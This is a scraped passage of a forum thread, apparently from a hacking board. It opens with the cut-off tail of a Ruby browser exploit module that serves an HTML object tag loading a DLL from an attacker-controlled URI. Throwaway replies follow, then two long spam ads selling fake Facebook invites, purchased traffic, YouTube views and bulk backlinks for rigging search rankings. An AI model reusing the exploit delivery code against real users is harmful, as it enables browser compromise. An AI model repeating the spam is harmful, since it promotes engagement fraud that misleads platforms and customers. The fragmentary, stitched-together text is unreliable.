classid="#{dll_uri}#GenericControl"> <object> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html) end end
  17. nice code. -Gonzalez
  18. Doamne fereste, mi s-o facut rau cand am vazut. -Gonzalez
  19. Coldplay - Yellow.mp3 -Gonzalez
  20. -Gonzalez
  21. GFY! -Gonzalez
  22. Aveti clona LiveJasmin sau ceva similar? Ma intereseaza pentru un proiect. Multumesc! -Gonzalez
  23. For sale today is a fantastic freshly made FaceBook Invites, Live Traffic Selling, YouTube Views & Back Links reseller website to needy webmasters who are looking for Paid traffic, Back Links, More Twitter Followers to their accounts and FaceBook Fans/Likes via Invites to increase their web presence, click rate, possible leads and good alexa and search engine rankings. Premium business website included with nice presentable looks. Including great, brand able domain - TrafficXL.net Please note: this is NOT like 99% of other start-up sites on the internet where the site has been put together in 10 minutes with poor quality content – this is quality! Q. How much can I make? Did I told you its really a nice and working way to make some extra money with very little effort. It can make an easy $500 per week with just a small bit of promotion. This business model is in existence since last decade and still in practice because each day several new web entrepreneurs enter this competitive market with a thought to get their web presence but do you think all of them are able to retain their existence? NO and this is the market we will be going to hit and capture with our business model via this nicely made professional website. The business model i am selling is quite simple to understand. basically we will be selling traffic and backlink packages to needy website owners via our this website and we will be getting our cut from all the packages sold: FaceBook Invites:- 1. 1000 Invites 2. 2000 Invites 3. 5000 Invites 4. 10000 Invites Back Link Packs :- 1. 5 Permanent Back Links 2. 10 Permanent Back Links 3. 50 Permanent Back Links 4. 100 Permanent Back Links Live Traffic Packs:- 1. 10,000 visitors 2. 25,000 visitors 3. 50,000 visitors 4. 100,000 visitors YouTube Channel and Video views:- 1. 5,000 Views 2. 10,000 Views 3. 25,000 Views 4. 50,000 Views Q. What do I get with the package: * The whole website : TrafficXL.net * Domain name : TrafficXL.net * Content : Entire website content of TrafficXL.net * BONUS: Ways to promote the website will be told to auction winner. Q. So how much is this going to cost me? Bids start at JUST $79 I am a web developer and its my job to create and sell nice sites with huge potential and same applies with this site too. This is the way i earn my living. Creating this website yourself would obviously cost A LOT of money – but my loss is your gain. Q. What technical skills do I need? I’ve never run a website before. If you have an internet connection and can speak basic English – then you have all the skills required! It really is that easy! I will provide support for up to [10 days] – so if you get stuck you can always get hold of my via [chat, email,] Google Adsense: though its not necessary but if you want, i can place your adsense ads on the site too. You may ask from where I will get the Traffic, YouTube, BackLinks and FaceBook Invites which i will be selling on my website but lemme tell you that you don't ever have to generate the traffic you sell, when orders come in, you simply forward the orders to the other cheaper traffic suppliers and purchase the traffic and youtube views from them for about half the price, they do the rest which also include delivering the traffic to the website whose owner has placed the order with you, Which means that you will be earning a handsome commission from outsourcing your entire work and you can concentrate on your other projects basically making this website almost autopilot (just need some minutes to place cheap order on other website) and each sale will make you profit ranging from 40% - 50% of the placed value. There are different packages and in case you wish to make changes to the prices or visitor quantity, you can easily do it or i can assist you in doing this. Q. From where will i get those cheap outsourcers to all these 4 different services? Glad you asked or think about this question. You don't have to worry here too when I am here to sort all queries. I will be providing 3 - 5 different traffic, back links, twitter followers and facebook invites suppliers to the winning bidder, so he will always have a backup source of wholesale traffic and youtube, Back Links and facebook sites/persons. Every website needs traffic and other services we sell on this site, new websites are being created everyday, there is no shortage of customers for the services TrafficXL.net offers. You can't go wrong with this website. Also the site can also have Google Adsense to make some extra profit from ads. Q. I have a full-time job, can I run this in my spare time? The website basically runs itself. When visitors click on ads or buy products, you get paid! You can leave the site as it is or add more content if you desire. The website doesn't require any maintenance or updating, ever. All payments will go to your PayPal account, then you just forward the orders to the suppliers. Very simple and good business. BID: $79 BIN: $150
  24. Google domination! GET 2000+ Backlinks for as low as $10 I won’t tire you with sales pitch so let’s get straight to the business as we’re all want an increase in SERPs and know that backlinks work. 2,000 Verified backlinks - $10.00 5,000 Verified backlinks - $20.00 10,000 Verified backlinks- $25.00 20,000 Verified backlinks- $50.00 50,000 Verified backlinks - $90.00 100,000 Verified backlinks - $250.00 300,000 Verified backlinks - $500.00 *NEW* PR4+ VERIFIED BACKLINKS PACKAGES 200 PR4+ Verified backlinks – $15 500 PR4+ Verified backlinks – $30 1000 PR4+ Verified backlinks – $50 You can point them to: your websites directly Web 2.0 properties and linkwheels Ezine articles social bookmarks high PR forum profiles Doing this will allow you to get link juice from thousands of backlinks to your money site using higher quality backlinks as a buffer! Why Order From Me? Incredibly Low Prices Fast turnaround Unlimited amount of anchors and URLs (read more on that below)* Special characters Special characters are all supported, however I want to be notified in advance of its presence because some characters like “ø” can be easily missed. Unlimited URLs and anchors explained *You can also provide as many URLs and anchors as you want and the number of anchors and URLs does not have to be equal. However, I will not specify certain keywords to specific URLs, they must all work together. Example: If you have 10 keywords for three URL’s, all 10 keywords must be suitable as anchor text for all three URL’s provided. Refund Policy: If you do not get your report within 5 days after you have ordered, you will get a full refund no questions asked. Payment: Paypal
×
×
  • Create New...